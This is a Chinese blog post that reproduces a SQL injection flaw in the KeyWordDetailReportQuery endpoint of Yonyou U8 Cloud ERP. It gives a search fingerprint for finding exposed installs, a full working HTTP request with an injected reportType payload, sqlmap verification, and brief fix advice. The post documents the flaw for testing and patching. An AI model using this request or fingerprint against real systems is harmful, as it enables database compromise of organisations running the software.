用友U8 Cloud KeyWordDetailReportQuery sql注入漏洞

最新推荐文章于 2024-06-24 11:34:14 发布
最新推荐文章于 2024-06-24 11:34:14 发布
阅读量1.9k 收藏 10
点赞数 7
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135269254
版权

产品介绍

用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。

漏洞描述

用友U8 Cloud KeyWordDetailReportQuery接口存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞,进一步利用可造成主机失陷。

资产测绘

app=“用友-U8-Cloud”

漏洞复现

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 207
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"reportType": "' AND 2780 IN (select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) AND 'njGF'='njGF", "usercode": "18701014496", "keyword": [{"keywordPk": "1", "keywordValue": "1", "keywordIndex": 1}]}

返回123456的md5值即存在该漏洞
在这里插入图片描述
sqlmap验证
在这里插入图片描述

修复建议

1.升级至系统最新版本
2.部署Web应用防火墙,对数据库操作进行监控

keepb1ue
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友U8Cloud总账模块概述
05-30
### 用友U8Cloud总账模块概述 #### 一、引言 用友U8Cloud作为一款面向中型及成长型企业市场的云ERP产品,旨在帮助企业实现数字化转型,提升管理效率与决策质量。其中,总账模块是财务管理的核心组成部分,承担着...
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
qq_42067124的博客
12-28 666
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 622
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
【HW必备】用友NC-Cloud存在17处漏洞合集
最新发布
wananxuexihu的博客
06-24 1250
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
Karka_的博客
03-16 907
补丁名称问题描述发布时间产品版本领域模块nc65_sysFunctionManager下标越界和空指针合集补丁NC6.5集团采供库存管理nc633_ldap公共入口漏洞补丁nc633_ldap公共入口漏洞补丁NC6.33UAP基础技术框架nc65_ldap公共入口漏洞补丁nc65_ldap公共入口漏洞补丁NC6.5UAP基础技术框架ncc1909ldap公共入口漏洞补丁ncc1909ldap公共入口漏洞补丁应用平台基础技术框架。
用友 NC Cloud jsinvoke 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 1020
用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞,攻击者可以通过利用此漏洞向系统上传任意恶意文件。
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9143
用友NC 漏洞汇总
用友U8 CLOUD 数据集成方案
05-11
用友U8 CLOUD 数据集成方案,外部数据交换平台主要用于外部系统和 U8 cloud 系统进行集成。利用外部数据交换平台, 可以将外系统的基本档案和业务数据发送到 U8 cloud 系统中,并进行相关的业务操作,如审 批、弃审...
用友U8 cloud V3.0发版说明产品功能介绍-整体版-2020年6月.PDF
06-23
用友U8Cloud V3.0版本发版说明及功能介绍。最新发版产品。2020年6月23日。集团版企业管理软件。
用友U8常用的SQL语句查询.sql
04-21
用友U8系统运维经常用到的SQL语句,可以查询总账、出入库明细报表
漏洞复现】用友NC Cloud uploadChunk任意文件上传漏洞
失心少年
11-22 444
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。漏洞链接:http://127.0.0.1/ncchr/pm/fb/attachment/uploadChunk?
用友-NC-Cloud远程代码执行漏洞[2023-HW]
holyxp的博客
08-13 1976
漏洞是通过请求特定的接口,然后调用"nc.itf.iufo.IBaseSPService"服务中的"saveXStreamConfig"方法进行请求;直接往webapps/nc_web/目录写马。最后访问刚才写的马,调用 Runtime.getRuntime().exec(“command”) 来执行系统命令,并通过getInputStream()获取该命令的输出流;然后IOUtils.toString() 方法将输出流转换为字符串。
用友 NC及NC Cloud 多处反序列化RCE漏洞复现
0xSec
12-17 1632
用友 NC及NC Cloud存在多处反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
接口-用友NC-Cloud系统某接口存在信息泄露漏洞-1day未公开漏洞
weixin_43167326的博客
02-23 479
用友NC-Cloud是一款基于云计算的企业管理软件,提供财务、人力资源、供应链管理等全方位业务管理功能,并结合大数据、人工智能等前沿技术,实现智能化决策支持和业务流程优化。NC-Cloud采用模块化架构,灵活适配各行业需求,可实现跨地域、跨部门的协同办公,帮助企业实现数字化转型,提升管理效率和决策精准度。
用友 NC IUpdateService XXE漏洞复现
0xSec
01-06 1343
用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。
漏洞复现--用友NC-Cloud全版本任意文件上传/RCE
qq_53003652的博客
10-19 2261
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品最近爆出了全版本的一个文件上传/RCE,攻击者可利用此漏洞直接获得服务器权限。这里不知道为什么404,但c0nf1g.jsp上传成功了,后续操作正常。2.POST访问c0nf1g.jsp构造RCE。联系厂家发布更新补丁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值